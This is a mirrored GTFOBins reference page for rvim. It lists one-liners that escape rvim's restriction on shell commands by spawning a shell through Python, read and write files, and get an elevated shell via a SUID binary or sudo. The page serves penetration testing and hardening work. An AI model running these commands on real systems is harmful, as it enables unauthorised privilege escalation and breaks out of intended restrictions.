1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-20 02:42:45 +02:00
GTFOBins.github.io/_gtfobins/rvim.md
2018-12-03 13:06:41 +00:00

433 B

description functions
From the manual: with rvim "It will not be possible to start shell commands".
shell file-write file-read suid sudo
code
rvim -c ':py import os;os.system("sh")'
code
rvim file_to_write iDATA ^[ w
code
rvim file_to_read
code
./rvim -c ':py import os;os.system("sh")'
code
sudo rvim -c ':py import os;os.system("sh")'